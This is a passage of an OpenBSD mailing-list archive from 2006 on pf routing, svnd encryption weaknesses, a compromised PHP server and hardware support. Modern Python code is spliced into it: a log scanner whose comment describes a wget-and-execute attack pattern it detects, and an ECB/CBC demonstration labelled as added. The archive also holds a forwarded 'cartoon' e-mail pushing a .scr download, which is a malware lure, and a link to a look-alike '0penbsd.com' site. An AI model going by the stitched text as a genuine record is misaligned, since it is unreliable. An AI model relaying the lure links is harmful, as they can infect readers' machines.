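            if rec["findings"]:
                hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        f = hit["findings"][0]
        print(f'{hit["ip"]} {hit["script"]} status={hit["status"]} {f["param"]}={f["decoded"]!r}')
```

Run against a real access log one line at a time; the decoded value is what to read, since the percent-encoding in the raw line hides the "cd /tmp; wget ...; chmod +x ...; ./..." sequence that makes the request unambiguous.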
Re: DadOS - sys shutdown with XDM
Feh, just have a read-only / with a read/write /home. Then just tell Dad to pull the plug when he's finished. FWIW he, and you, will probably go back to windows right quick with that solution.
Re: learning to code - suggestions needed
On Tue, 03 Jan 2006 14:35:12 -0800 Joe S [EMAIL PROTECTED] wrote:
Do you have any recommendations on how I should get started?
* Community college courses?
* College courses?
Always helpful, if you're not in full time employment.
* Self-study books?
Probably the best source of information. Choose UNIX environment programming books, they're the most informative. I like this one currently: http://www.amazon.co.uk/exec/obidos/ASIN/0131411543, covers lots, probably not much good to a beginner, so if it's C you're interested in, try this: http://www.amazon.co.uk/exec/obidos/ASIN/0393969452
College courses can be a bit useless unless it covers what you really want to know. Otherwise you will spend three years on a degree course to just learn to code, and that sounds like a waste of time to me. If you want to learn programming, spend 30 mins on the loo with a good book in your hands, it's worth 10 hours in the classroom (added geek points if you have a wireless network and it's the pdf).
-- Regards, Ed http://www.usenix.org.uk - http://irc.is-cool.net :%s/Open Source/Free Software/g
Re: How did they get here?
On 4 Jan 2006, at 16:10, knitti wrote: I would think php, but this doesn't explain it unless you turned the chroot off. Due to historical reasons, we're not running apache chrooted. This is why they're in /tmp rather than /var/www/tmp, or any other place. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: How did they get here?
From: Gaby vanhegan [mailto:[EMAIL PROTECTED] I would think php, but this doesn't explain it unless you turned the chroot off. Due to historical reasons, we're not running apache chrooted. This is why they're in /tmp rather than /var/www/tmp, or any other place. Given the security posture of a system running PHP (and PHP apps with a poor security history) in a non-chrooted environment, I'd agree that you've got a pretty acute risk avenue staring you in the face. DS
Re: How did they get here?
Gaby vanhegan wrote: On 4 Jan 2006, at 16:10, knitti wrote: I would think php, but this doesn't explain it unless you turned the chroot off. Due to historical reasons, we're not running apache chrooted. This is why they're in /tmp rather than /var/www/tmp, or any other place. historical ?
system processes
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

How can I make it so that non-root (or non-wheel) users cannot view the processes of other users?

iD8DBQFDvDc+oN5ZK8eGpqMRAoGiAKDGZI9Zs5fy91d5mQK/k92uXcZoAQCg8ciP
rIpVkKsS1nUH3MZgZeTu13Q=
=BSjJ
-----END PGP SIGNATURE-----
Re: How did they get here?
On 4 Feb 2006, at 20:38, veins wrote:
I would think php, but this doesn't explain it unless you turned the chroot off.
Due to historical reasons, we're not running apache chrooted. This is why they're in /tmp rather than /var/www/tmp, or any other place.
historical ?
There are sites on this machine that we've had since 2000, and that were running on various insecure OSes before we made the move to OpenBSD. I suspect that it would be a medium/large sized task to make these sites work under chroot, as well as reorganise the user home folders to fit in with this. On the other hand, getting my server pwn3d (again) is even more of a ballache. Time to book in some configuration time... Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: system processes
Hi Zophie can help You with that: http://www.0penbsd.com/zophie.html Best Regards
At 21:59 2006-01-04, you wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

How can I make it so that non-root (or non-wheel) users cannot view the processes of other users?

iD8DBQFDvDc+oN5ZK8eGpqMRAoGiAKDGZI9Zs5fy91d5mQK/k92uXcZoAQCg8ciP
rIpVkKsS1nUH3MZgZeTu13Q=
=BSjJ
-----END PGP SIGNATURE-----
problem with packet filter
Hello
I have two openbsd 3.8 boxes with packet filter, carp interfaces and pfsync like this:
LAN -- || || | hme3 | - hme1 [ OpenBSD0 ] hme0 --- internet | internet | hme2 | |gw1 | gw2 | | |--- | | | | | | | hme2 | | - hme1 [ OpenBSD1 ] hme0 --- | || | hme3 | || --
I do not use round robin to load balance because the machines on the LAN will never create connections... they will only respond to internet requests. I want each box not to have a default gateway, because the packet will be returned depending on the interface it came in from. And that works fine.
But I need to connect to anywhere from a specific public host and only via internet gw1 (hme0), and it does not work, so I have created this rule in each box ($proxy is a macro with a public ip address and $gateway is the ip address of my gateway):

pass in quick on hme0 from $proxy to any tag PROXY keep state
pass out quick reply-to ( hme0 $gateway ) keep state tagged PROXY

For example, if I want to connect to the ssh port from $proxy to any hme0 interface, I can not. This is my tcpdump output:

# tcpdump -n -e -ttt -i hme0 host 200.13.161.68
tcpdump: listening on hme0, link-type EN10MB
Jan 04 11:37:41.242856 0:6:2a:96:f0:a9 0:3:ba:39:70:46 0800 62: $proxy.56791 > $hme0ip.22: S 2158877508:2158877508(0) win 65535 <mss 1460,nop,nop,sackOK> (DF)
Jan 04 11:37:41.243131 0:6:2a:96:f0:a9 0:3:ba:39:70:46 0800 62: $proxy.56791 > $hme0ip.22: S 2158877508:2158877508(0) win 65535 <mss 1460,nop,nop,sackOK> (DF)
Jan 04 11:37:41.243187 0:3:ba:39:70:46 0:6:2a:96:f0:a9 0800 62: $proxy.56791 > $hme0ip.22: S 2158877508:2158877508(0) win 65535 <mss 1460,nop,nop,sackOK> (DF)
Jan 04 11:37:41.243299 0:6:2a:96:f0:a9 0:3:ba:39:70:46 0800 62: $proxy.56791 > $hme0ip.22: S 2158877508:2158877508(0) win 65535 <mss 1460,nop,nop,sackOK> (DF)
Jan 04 11:37:41.243321 0:3:ba:39:70:46 0:6:2a:96:f0:a9 0800 62: $proxy.56791 > $hme0ip.22: S 2158877508:2158877508(0) win 65535 <mss 1460,nop,nop,sackOK> (DF)

Look... the packet comes from the proxy ip address, but the ip address of my hme0 interface never replies to this request. The log of my packet filter shows me nothing about dropping or rejecting the response packet from the hme0 ip address. Any suggestions I will appreciate so much :) Thanks in advance Mario
High Load Averages
Hello, I am running OBSD 3.8 as my monitoring / proxy server. I have been having issues with high load averages (2-2.5) on Nagios (installed chroot by packages). If I run squid (installed from ports), the load average goes up into the 6-7's. CPU is 95% free, Memory is 85-90% free, swap is unused (0K/2048M). My initial thought was that it was Nagios, but Squid (by itself) is also running high load averages. I have other OBSD servers (mail gateways and such) that are always less than 1.0 load average. When I run vmstat, there are usually between 3-7 blocked processes (although I have seen as many as 22), and they are constant (on every 5 second poll). Eventually (after a few days), the process becomes unresponsive and I have to reboot the server. my vmstat -w 5 output is:

 procs     memory         page                     disks    traps         cpu
 r  b w    avm     fre    flt re pi po fr sr wd0 wd1  int   sys   cs us sy  id
 0  4 0  88604  823596   1360  0  0  0  0  0   0   0  423  1628   44  1  1  98
 0  3 0  87764  824704   3679  0  0  0  0  0   0   0  417  4113   66  2  7  91
 0  4 0  88588  823588   1680  0  0  0  0  0   0   0  354  1705   46  1  2  98
 0  3 0  87760  824708   3913  0  0  0  0  0   0   0  310  3561   69  1  3  95
 0  3 0  87760  824712   2048  0  0  0  0  0   0   0  389  2388   44  1  6  93
 0  4 0  88556  823608   3881  0  0  0  0  0   0   0  444  3547   66  3  2  95
 2  3 0  89540  822048   1772  0  0  0  0  0   0   0  414  2721   41  1  8  91
 0  3 0  87760  824232   3712  0  0  0  0  0   0   0  381  3459   73  4  3  93
 0  3 0  87760  824712   1325  0  0  0  0  0   0   0  371  1291   39  1  1  98
 0  3 0  87760  824712   4655  0  0  0  0  0   0   0  391  4463   72  2  7  90
 0  3 0  87760  824716   1365  0  0  0  0  0   0   0  414  1381   43  0  2  98
 0  3 0  87764  824708   4140  0  0  0  0  0   0   0  396  4502   72  5  5  91
 0  3 0  87760  824716   1749  0  0  0  0  0   0   0  438  2109   48  1  3  96
 0  5 0  89208  822572   4202  0  0  0  0  0   0   0  433  3952   74  1  4  95
 0  3 0  87756  824720   1600  0  0  0  0  0   0   0  472  1597   57  1  2  97
 0  3 0  87756  824716   4334  0  0  0  0  0   0   0  426  4491   66  2  7  90
 0  3 0  87760  824708   1341  0  0  0  0  0   0   0  452  1291   37  1  2  97
 0  3 0  87760  824708   3874  0  0  0  0  0   0   0  450  4270   67  3  7  90
 0  3 0  87760  824712   1541  0  0  0  0  0   0   0  340  1477   40  1  1  98
 0  3 0  87760  824712   3884  0  0  0  0  0   0   0  406  3496   61  2  3  95
 0  4 0  88604  823588   1794  0  0  0  0  0   0   0  393  2239   54  2  5  93
 0  3 0  87756  824716   3657  0  0  0  0  0   0   0  422  3410   65  1  3  95
 0  3 0  87764  824708   1768  0  0  0  0  0   0   0  438  2125   50  1  3  96
 0  3 0  87760  824708   4066  0  0  0  0  0   0   0  455  3654   66  3  2  94
 0  4 0  88552  823608   1563  0  0  0  0  0   0   0  392  1519   40  1  1  98
 0  3 0  87760  824232   4077  0  0  0  0  0   0   0  430  4207   74  4  3  93
 0  3 0  87760  824708   1317  0  0  0  0  0   0   0  424  1280   39  1  1  98
 0  4 0  88568  823600   4233  0  0  0  0  0   0   0  460  4659   66  3  7  90
 0  3 0  87760  824712   1550  0  0  0  0  0   0   0  415  1507   45  1  1  98
 0  3 0  87760  824712   4105  0  0  0  0  0   0   0  419  3688   73  3  3  95
 0  4 0  88536  823636   8791  0  0  0  0  0   0   0  440 14787  229 21 13  66
 0  3 0  87724  824756   2200  0  0  0  0  0   0   0  278  2221   43  1  2  97
 0  3 0  87724  824752      8  0  0  0  0  0   0   0  321   103   17  0  0 100
 0  3 0  87724  824756    188  0  0  0  0  0   0   0  357   258   16  0  0 100
 0  3 0  87724  824752      7  0  0  0  0  0   0   0  356    90   13  0  0 100
 0  7 0  90592  820320   8643  0  0  0  0  0   0   0  514  9263  189  5 15  80
 0  3 0  87724  824756   1586  0  0  0  0  0   0   0  301  1597   58  1  1  98
 0  4 0  88508  823668   9378  0  0  0  0  0   0   0  374  8348  119  5  7  88
 0  4 0  88532  823640   1940  0  0  0  0  0   0   0  343  2299   55  1  6  93
15 15 0 189680  712732  19460  0  0  0  0  0   0   0  441 31721  238 33 14  54
 6 22 0 195568  706708  37552  0  0  0  0  0   0   0  575 73375  661 71 29   0
 0  6 0 106440  804032  32993  0  0  0  0  0   0   0  675 58724  663 49 29  22
 0  7 0 107268  802876   3371  0  0  0  0  0   0   0  417  4513   89  3  6  91
 0  7 0 107256  802408   7764  0  0  0  0  0   1   0  402  7988  131  8  9  83
 0  6 0 106436  804028   1831  0  0  0  0  0   0   0  390  2514   60  2  2  96
 0  5 0  89152  822584   5466  0  0  0  0  0   0   0  420  7000   89  6  5  90
 0  4 0  88532  823628   1899  0  0  0  0  0   0   0  444  2725   64  1  6  93
 0  3 0  87728  824700   3820  0  0  0  0  0   0   0  434  3614   85  3  2  95
 0  3 0  87724  824700   1557  0  0  0  0  0   0   0  395  1481   42  1  2  98
 0  4 0  88524  823600   4210  0  0  0  0  0   0   0  440  4218   67  2  7  90
 0  3 0  87724  824704   1577  0  0  0  0  0   0   0
Patches out, no errata page update ?
So...I see there are some new patches out but no errata page update ?

150 Have a Gorilla.
drwxr-xr-x    2 1114  1114   512 Jan 03 13:03 .
drwxr-xr-x   18 1114  1114   512 Dec 30 21:03 ..
-r--r--r--    1 1114  1114  7152 Jan 03 12:10 001_perl.patch
-r--r--r--    1 1114  1114  3953 Dec 30 20:29 002_fd.patch
226 There, everyone likes a Gorilla.
ftp> pwd
257 /pub/OpenBSD/patches/3.8/common

-- Allie Daneman Allnix,LLC. http://www.allnix.net
Re: problem with packet filter
On 2006/01/04 15:39, Mario Beltran wrote:
I want each box not to have a default gateway, because the packet will be returned depending on the interface it came in from.
Does adding a route to $proxy pointing to $gateway help..?
Re: CGD
warning! spoilers! openbsd svnd is not safe for general use.
On 1/4/06, Ted Unangst [EMAIL PROTECTED] wrote:
this is good idea. the first thing you need to do is identify your threat model. can you write it down? and if it starts with somebody stealing, you lose. amidst all the yammering, i think people are just assuming that encrypting their data makes it safe. but if you can't even say what the danger is, how can you know it's safe?
my threat model includes the following two cases. for both of them svnd can't protect me really well.
case 1) let's say someone can predict some blocks in my encrypted data, then she can find every block (64bit) everywhere within the container with the same data. dependent on the nature of the data, if some blocks are known, more can be guessed. the license part of a source file is very predictable. so if some software's source, which is no secret but its possession illegal, can be proved to be on my disk without breaking my key, this is bad.
some illustration to prove that every block of the same data encrypted with the same user-key is the same in every svnd0 in the world:

# dd if=/dev/zero of=/tmp/img0 bs=1k count=1
1+0 records in
1+0 records out
1024 bytes transferred in 0.000 secs (1067 bytes/sec)
# dd if=/dev/zero of=/tmp/img1 bs=1k count=1
1+0 records in
1+0 records out
1024 bytes transferred in 0.000 secs (1280 bytes/sec)
# vnconfig -ckv svnd0 /tmp/img0
Encryption key: test
svnd0: 1024 bytes on /tmp/img0
# vnconfig -ckv svnd1 /tmp/img1
Encryption key: test
svnd1: 1024 bytes on /tmp/img1
# dd if=/usr/share/misc/license.template of=/dev/rsvnd0c bs=1k count=1
1+0 records in
1+0 records out
1024 bytes transferred in 0.000 secs (12190476 bytes/sec)
# dd if=/usr/share/misc/license.template of=/dev/rsvnd1c bs=1k count=1
1+0 records in
1+0 records out
1024 bytes transferred in 0.000 secs (1138 bytes/sec)
# vnconfig -u svnd0
# vnconfig -u svnd1
# cmp /tmp/img0 /tmp/img1
#

user key==encryption key==Bad Thing(TM)

case 2) data integrity. I don't want that a person can mess with my data without knowing my key. the location of some data can be determined on my disk, this data can be replicated everywhere else on the disk, either by insertion or by overwriting other data.
illustration continued:

# dd if=/tmp/img0 of=/tmp/img3 skip=1 bs=128 count=1
1+0 records in
1+0 records out
128 bytes transferred in 0.000 secs (1488372 bytes/sec)
# cat /tmp/img3 /tmp/img3 /tmp/img3 /tmp/img3 > /tmp/img6
# vnconfig -ckv svnd0 /tmp/img6
Encryption key: test
svnd0: 512 bytes on /tmp/img6
# cat /dev/rsvnd0c
dx should be separated by a comma, e.g. Copyright (c) 2003, 2004 p_h[he copyright. Additional years should be separated by a comma, e.g. Copyright (c) 2003, 2004 p_h[he copyright. Additional years should be separated by a comma, e.g. Copyright (c) 2003, 2004 p_h[he copyright. Additional years should be separated by a comma, e.g. Copyright (c) 2003, 2004 If you add extra text
#

classical replay attack. I seem to have screwed some block boundary, but you get the general idea. a good implementation would've produced garbage only.
thanks a lot for your attention.
--knitti
Re: problem with packet filter
Stuart Henderson wrote:
On 2006/01/04 15:39, Mario Beltran wrote:
I want each box not to have a default gateway, because the packet will be returned depending on the interface it came in from.
Does adding a route to $proxy pointing to $gateway help..?
Thank you Stuart for your response :) Do you mean that I have to add a static route manually? I don't want it this way, I want packet filter to do this. I mean that the route-to and reply-to commands were created for these situations... or am I wrong? Regards Mario.
Re: pf failover state problem
On Thu, 29 Dec 2005 23:04:02 -0700 j knight [EMAIL PROTECTED] wrote: When you compare pfctl -ss on either firewall, do you see state information being replicated? Yep, I can confirm the states are being copied just fine. I hope someone is still watching this thread! -- Regards, Ed http://www.usenix.org.uk - http://irc.is-cool.net :%s/Open Source/Free Software/g
PERC 4e/si support in ami?
hi list, I'm searching for a 1U server platform solution for a redundant firewall system based on openbsd. The firewall system should support raid 1 and at least 8 NICs. My first choice is a Dell 1850 with embedded PERC 4e/Si controller. I believe the e means embedded. Does openbsd support the PERC 4e/Si by ami (the manpage only lists PERC 4/Si without e)? The raid controller has to be embedded because i need the two pci slots for quad ethernet cards. And this is my second question. Which quad ethernet card is to be recommended? I know this question was discussed many times. But i don't want to get into trouble with this interrupt handling under heavy load with intel cards and the em driver. In addition i don't need 1 Gbps ethernet cards - 100 Mbit is sufficient. The D-Link DFE-570TX seems to be the right one for this purpose but that implies putting an old pci card (32 bit, spec pci2.2) into a pci-x slot. Is this really a good idea? Any recommendations would be appreciated. joerg
Re: PERC 4e/si support in ami?
Works like a champ. I'll adjust the man.
On Thu, Jan 05, 2006 at 12:41:30AM +0100, Jörg Streckfuß wrote:
hi list, I'm searching for a 1U server platform solution for a redundant firewall system based on openbsd. The firewall system should support raid 1 and at least 8 NICs. My first choice is a Dell 1850 with embedded PERC 4e/Si controller. I believe the e means embedded. Does openbsd support the PERC 4e/Si by ami (the manpage only lists PERC 4/Si without e)? The raid controller has to be embedded because i need the two pci slots for quad ethernet cards. And this is my second question. Which quad ethernet card is to be recommended? I know this question was discussed many times. But i don't want to get into trouble with this interrupt handling under heavy load with intel cards and the em driver. In addition i don't need 1 Gbps ethernet cards - 100 Mbit is sufficient. The D-Link DFE-570TX seems to be the right one for this purpose but that implies putting an old pci card (32 bit, spec pci2.2) into a pci-x slot. Is this really a good idea? Any recommendations would be appreciated. joerg
Re: problem with packet filter
On 2006/01/04 17:00, Mario Beltran wrote:
Does adding a route to $proxy pointing to $gateway help..?
Thank you Stuart for your response :) Do you mean that I have to add a static route manually?
Yes (I usually add static routes in /etc/hostname.hme0, etc.)
I don't want it this way, I want packet filter to do this. I mean that the route-to and reply-to commands were created for these situations... or am I wrong?
You are right, that is what route-to/reply-to are for, but when there is no routing table entry, the packet will be rejected (destination-unreachable) before it even reaches PF. Once PF has control of the packet, route-to/reply-to will be used in preference to the static route. You could point the static route to a non-existent address if one is available (it needs to be on a directly-connected subnet, otherwise attempting to add the route will give an error). Once this is done, you might need to adjust the rules. I don't think you need tagging (unless I mis-understood what you're trying to do). pfctl -sr -v is useful to let you check which rules are triggered.
Re: CGD
On Wed, Jan 04, 2006 at 11:11:01PM +0100, knitti wrote:
my threat model includes the following two cases. for both of them svnd can't protect me really well
case 1) let's say someone can predict some blocks in my encrypted data, then she can find every block (64bit) everywhere within the container with the same data.
Of course not, that would have been true if it used ecb. It uses cbc which encrypts each disk block with an iv that depends on the block number, so a plaintext block will be encrypted differently depending both on which disk block it is in and what data precedes it in that block.
# vnconfig -ckv svnd1 /tmp/img1
[...]
# dd if=/usr/share/misc/license.template of=/dev/rsvnd0c bs=1k count=1
[...]
# cmp /tmp/img0 /tmp/img1
You are comparing the entire images. Try instead to fill one image with a repeating 8-byte pattern and then check the contents. The encrypted contents will not be repeated.
user key==encryption key==Bad Thing(TM)
How would it help to generate a random key which is then encrypted with a user key and stored on the disk? A dictionary attack is still quite possible.
While I'm here I'd like to ramble for a while about the fact that people seem to be obsessed with the ability to change their passphrases; I've seen it at least twice in this thread and sometimes I even hear people talking about changing the passphrase on pgp keys and similar. That only helps if you are sure no one has seen your previously encrypted key but now has been able to guess your passphrase and may in the future be able to access your encrypted key. See, if they already have a copy of the key encrypted with the old passphrase they will still be able to use your old passphrase on it. By reencrypting it with a new passphrase you only give them another chance to crack it. So changing the passphrase which is used to encrypt a key is stupid, you really need to generate a new key. So it will take a long time to reencrypt the disk, tough luck.
The problem with user remembered passwords is that they aren't strong. The only way around that is to store a random number somewhere, e.g. a USB stick or a floppy. Therefore, you may want a combination of a stored random secret and some passphrase. You lose either = you lose your data. If someone finds the stored secret they can mount a dictionary attack or start extracting your finger nails. If you store the random secret on the disk itself it's a salt. While you can use a dictionary on it, it does mean that you have to do that for each disk you want to crack. So, salt + passphrase is good, and if you can store the salt wherever you want it's as good as you can do.
case 2) data integrity. I don't want that a person can mess with my data without knowing my key. the location of some data can be determined on my disk, this data can be replicated everywhere else on the disk. [...] classical replay attack. I seem to have screwed some block boundary,
No. I don't know why you assume that ecb is used, the reason your output is messed up is cbc. It is possible to cut and paste encrypted data to some extent, but when you do that you will always mess up one crypto block. No way around that unless you find the key, so while this can be a problem it is a little less severe than you say. This is a problem with cbc, to avoid it you need to use another block chaining mode or add some integrity check. CGD also uses cbc according to http://www.imrryr.org/~elric/cgd/html4/cgd.html so unless there is some additional integrity check (which is a problem for block devices since it requires additional storage) it has the same problem.
Andreas
web server project
Hi misc@ users, I have been working for a while on an ISC/OpenBSD licenced web server that will be used as an httpd replacement for our not-for-profit organization. Code is at a very early stage, but is being worked on actively and has been powering our own boxes for weeks now (for static pages only). We are looking for people interested in joining the project, whether for testing or contributing code, html, design or simply ideas. If you are interested, feel free to mail me and ask any question you might have. oh, and just to prevent trolls, goals are different from thttpd, lighttpd and definitely very very far from apache's, and so are the design and features planned. I'm not advertising the irc channel here, but here's a link to our cvsweb so you can take a look, keep in mind that it's at a _very early_ stage so lots of code is being worked on and isn't definitive: http://lab.skreel.org/cgi-bin/cvsweb/eoz/ Sorry for those that are not interested, I won't spam anymore ;-) ++ veins
Deletion of indirectly -installed packages (dependencies)
Hi, I want to know if there are any plans to support the deletion of indirectly-installed packages (dependencies). What I'm trying to say is, for example, when one adds package FOO, and that package has tons of dependencies, and one then deletes it, we didn't uninstall all the dependencies. I know it isn't simple, one must first have a way to say: hey, I'm a package who was added by a user, I wasn't added just to serve a package you deleted!!, and then check if the dependency is used by any package. Also, it should always ask if we want to delete that dependency, maybe someone starts using it directly instead of using the package which needed it to be added. But, IMHO, it would be nice, =). Help you understand me, good luck
Re: CGD
Andreas Gunnarsson wrote:
On Wed, Jan 04, 2006 at 11:11:01PM +0100, knitti wrote:
my threat model includes the following two cases. for both of them svnd can't protect me really well
case 1) let's say someone can predict some blocks in my encrypted data, then she can find every block (64bit) everywhere within the container with the same data.
Of course not, that would have been true if it used ecb. It uses cbc which encrypts each disk block with an iv that depends on the block number, so a plaintext block will be encrypted differently depending both on which disk block it is in and what data precedes it in that block.
Yeah, and had it been using ECB, still two plaintexts would have to be aligned to the beginning of a block and fill the 64 bits for the ciphered block to look the same.
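The three CGD messages above (knitti's svnd illustration, Andreas's reply that a per-sector IV under CBC already defeats the block-matching case but not the cut-and-paste case, and the remark that even ECB needs block alignment) can be checked concretely. Below is an added example, not code from the thread, from svnd or from CGD: Python with a constructed 4-round Feistel network over 64-bit blocks (keyed with HMAC-SHA256) standing in for Blowfish, because the point is the chaining mode, not the cipher. The sector IV derived from the key and sector number is my assumption; the thread only says svnd's IV depends on the block number. `pattern_analysis` runs Andreas's repeating-pattern test and knitti's two-sector comparison under both ECB and CBC, and `spliced_ciphertext_damage` shows how much plaintext a ciphertext splice garbles under CBC, which is why an integrity check is needed to detect it.

```python
"""Mode demonstration for the svnd/CGD thread. Added example, not svnd's or
CGD's code. The block cipher is a constructed Feistel network over 64-bit
blocks (same block size as Blowfish), used only as a keyed permutation."""
import hashlib
import hmac

BLOCK = 8        # 64-bit block, like Blowfish
SECTOR = 512     # one disk sector = 64 blocks
ROUNDS = 4
KEY = b"test"    # constructed key, mirrors the passphrase typed in the thread


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, i, half):
    # Round function: keyed hash of the round number and the right half.
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:BLOCK // 2]


def block_encrypt(key, blk):
    left, right = blk[:BLOCK // 2], blk[BLOCK // 2:]
    for i in range(ROUNDS):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right


def block_decrypt(key, blk):
    left, right = blk[:BLOCK // 2], blk[BLOCK // 2:]
    for i in reversed(range(ROUNDS)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right


def _blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key, data):
    # Identical plaintext blocks give identical ciphertext blocks, anywhere.
    return b"".join(block_encrypt(key, b) for b in _blocks(data))


def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for b in _blocks(data):
        prev = block_encrypt(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for c in _blocks(data):
        out.append(_xor(block_decrypt(key, c), prev))
        prev = c
    return b"".join(out)


def sector_iv(key, sector):
    # Assumption: IV derived from key and sector number. The thread only says
    # the IV depends on the block number; the real derivation is not on the page.
    return hmac.new(key, sector.to_bytes(8, "big"), hashlib.sha256).digest()[:BLOCK]


def encrypt_sector(key, sector, plaintext, mode):
    if mode == "ecb":
        return ecb_encrypt(key, plaintext)
    return cbc_encrypt(key, sector_iv(key, sector), plaintext)


def pattern_analysis(key):
    """Andreas's test (repeating 8-byte pattern inside one sector) and knitti's
    test (same content at two sector numbers), per mode: how many distinct
    ciphertext blocks the sector holds, and whether both sectors encrypt alike."""
    plaintext = b"COPYRIGH" * (SECTOR // BLOCK)   # constructed, highly predictable data
    result = {}
    for mode in ("ecb", "cbc"):
        ct0 = encrypt_sector(key, 0, plaintext, mode)
        ct1 = encrypt_sector(key, 1, plaintext, mode)
        result[mode] = {"distinct_blocks": len(set(_blocks(ct0))),
                        "sector0_equals_sector1": ct0 == ct1}
    return result


def spliced_ciphertext_damage(key, cut_at=2):
    """knitti's case 2 under CBC: the tail of sector 1's ciphertext is copied
    over sector 0's ciphertext (no key involved) and decrypted as sector 0.
    Returns the block indices that decrypt to garbage: CBC garbles exactly the
    block at the splice and then resynchronises, so without an integrity check
    the planted data reads back cleanly from the next block on."""
    pt0 = bytes(range(256)) * (SECTOR // 256)             # constructed sector content
    pt1 = bytes(reversed(range(256))) * (SECTOR // 256)   # constructed sector content
    ct0 = cbc_encrypt(key, sector_iv(key, 0), pt0)
    ct1 = cbc_encrypt(key, sector_iv(key, 1), pt1)
    cut = cut_at * BLOCK
    decrypted = cbc_decrypt(key, sector_iv(key, 0), ct0[:cut] + ct1[cut:])
    intended = pt0[:cut] + pt1[cut:]
    return [i for i, (d, p) in enumerate(zip(_blocks(decrypted), _blocks(intended))) if d != p]


if __name__ == "__main__":
    print(pattern_analysis(KEY))
    print("garbled blocks after splice:", spliced_ciphertext_damage(KEY))
```

Under ECB the pattern sector collapses to a single distinct ciphertext block and both sectors are identical; under CBC with a sector IV all 64 blocks differ and the two sectors differ, which is Andreas's point. The splice result is the other half of his point: one garbled block, not a sector of garbage, so the modification is not self-evident from the decrypted data.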
Re: What does this error message mean?
I found a very strange line in my /etc/hosts file. The line says
::1 localhost.cimsolve.com localhost
This line is followed by a normal line
127.0.0.1 localhost.cimsolve.com localhost
How did the first line get there, because I didn't put it there. Jim
Re: What does this error message mean?
On Wed, Jan 04, 2006 at 08:44:19PM -0600, Jim Mays wrote:
I found a very strange line in my /etc/hosts file. The line says
::1 localhost.cimsolve.com localhost
This line is followed by a normal line
127.0.0.1 localhost.cimsolve.com localhost
How did the first line get there, because I didn't put it there.
does it look like it is from: /usr/src/distrib/miniroot/install.sh:
330 # Always create new hosts file.
331 cat > /tmp/hosts <<__EOT
332 ::1 localhost
333 127.0.0.1 localhost
334 ::1 $(hostname -s)
335 127.0.0.1 $(hostname -s)
336 __EOT
-- jared [ openbsd 3.8 GENERIC ( dec 16 ) // i386 ]
Re: What does this error message mean?
On Mon, Jan 02, 2006 at 08:17:43PM -0600, Jim Mays wrote: resolv.conf file: search hsd1.tx.comcast.net. nameserver 68.87.85.98 nameserver 68.87.69.146 looklup file bind if that is a paste-o and not a type-o, that might be attributable to a little bit of suckage. ( looklup != lookup ) -- jared [ openbsd 3.8 GENERIC ( dec 16 ) // i386 ]
You received a Humortadela cartoon
Hello! Someone who had nothing better to do, during one of their visits to Humor Tadela, for whatever reason, recommended the following page to you: Animated Joke: Happily Ever After? Didn't work? Don't despair! Open your browser and type the following address: http://humortadela.com.br/charges.scr Or go there by CLICKING HERE!!! Still didn't work? Well, then it's time to start despairing... The Humor Tadela crew. The biggest humor site in Latin America! http://humortadela.com.br On 03/01/2005, Brasília time; yellow, 75 and in good condition.